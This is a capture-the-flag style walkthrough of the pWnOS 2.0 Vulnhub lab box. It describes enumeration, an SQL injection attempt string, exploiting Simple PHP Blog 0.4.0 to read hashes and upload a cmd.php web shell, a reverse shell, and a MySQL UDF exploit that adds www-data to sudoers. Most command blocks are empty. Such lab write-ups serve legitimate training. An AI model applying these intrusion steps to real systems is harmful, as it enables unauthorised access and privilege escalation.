Vulnhub virtual machine; OSCP prep box, classic boot the root box which enumeration leads to a blog page that is suseptiable to pretty serious vulnerability that leads to the foothold of the box. Priv-esc was trickery as in the end the simplest solutions are the hardest to figure out - added secondary priv-esc.
Legal Usage: The information provided by executeatwill is to be used for educational purposes only. The website creator and/or editor is in no way responsible for any misuse of the information provided. All the information on this website is meant to help the reader develop penetration testing and vulnerability aptitude to prevent attacks discussed. In no way should you use the information to cause any kind of damage directly or indirectly. Information provided by this website is to be regarded from an “ethical hacker” standpoint. Only preform testing on systems you OWN and/or have expressed written permission. Use information at your own risk.
By continued reading, you acknowledge the aforementioned user risk/responsibilities.
Vulnhub Link: https://www.vulnhub.com/entry/pwnos-20-pre-release,34/ File: pWnOS_v2.0.7z (Size: 286 MB) - Filetype: .vmdk (virtual hard drive)
Setup Note: make sure you put VM 10.10.10.0/24 network.
Discover VM on network && ping for connectivity:
1 |
|
Target: 10.10.10.100 - and we have successful connectivity
Enumeration
Nmap Scan:
1 |
|
We are looking at an SSH server and an HTTP server.
Options: -We can try to kick in the front door of the SSH - unlikely -Navigate to web-server and investigate a way in.
Navigate to web-server:
source:
potential login and register page and discovered a possible user [email protected]
Login page:
attempt SQLi with email and ' or 3=3 --
No-go for injection.
Register New User: Creating a user: [email protected] / password
Looks like we have to activate the user account.
navigating to: http://10.10.10.100/activate.php?x=exec%40email.com&y=ab822cb907de2268500066b49acb17b4
activated now lets attempt to login and look for a way into the box.
Login:
seems to hang at this point…
Source:
confirmed we did not hang and we are just on an very non-interesting page.
Dirbuster - we need to find some new directories.
well we found a /blog
Navigate to /blog
source:
web-application identified as Simple PHP Blog 0.4.0
Searching for vulnerabilites
1 |
|
both exploits jump off the page. Download locally with -m
flag
checking out the 1191.pl
syntax we should attempt which should return the password file (hash):
1 |
|
result:
it successfully gave us the password hash. Lets see what else this exploit can do.
RCE
upload cmd.php
1 |
|
we have a successful cmd.php installed on web-server.
Quick test:
1 |
|
we get a response of www-data
- Execllent.
Reverse the shell:
Setup listener with Metasploit.
tell web-server to get my reverse shell .php file.
successful download. Now lets connect to the server.
Connection established.
Upgrade shell
1 |
|
upgraded!
now let’s move to priv-escalate.
Priv-Esc
First we need to enumerate a bit of the box with some scripts.
1 |
|
wget files to box
uploaded successfully to /dev/shm
Change chmod to 700
load scripts.
Scripts discovered a few priv-esc exploits
1 |
|
Investigate the WWW
folder
Discovered a mysqli_connect.php
which contains database creditials
Navigate /var
an noticed another mysqli_connect.php
Connecto to mysql server:
1 |
|
check for passwords:
found hashes to decrypt
Secondary Priv-Esc/Root
I wanted to attempt to try the “udav” and MySQL privilage escalations and while going doing the udav road I was unsuccessful escalating. When it came to the MySQL escalate I ran into a some slight issues compiling but was able to create the file locally and then send to box. Below you will see my solution via MySQL.
Exploit: - MySQL 4.x/5.0 User-Defined Function Local Privilege Escalation Exploit || http://www.exploit-db.com/exploits/1518 || Language=c
I downloaded locally and began inspecting the source:
1 |
|
while attempting to compile the raptor_udfs.so it would not compile on the box as so I compiled it locally and sent to box.
error recieved:
after compiled locally and sent:
login to MySQL server with prior credentials
1 |
|
recieved an error that the raptor_udf2.so
did not exist in the /usr/lib/raptor_udf2.so
so at this point I manually pushed the file to the directory.
under mysql table:
1 |
|
we have succefully aded www-data to the /etc/sudoer
file which we can just sudo bash
to achieve a root shell.
Root
The likelyhood of passwords being reused is always an options - attempt ssh to root
1 |
|
with the two variant of passwords is always worth a shot
Bring me the root!
-exec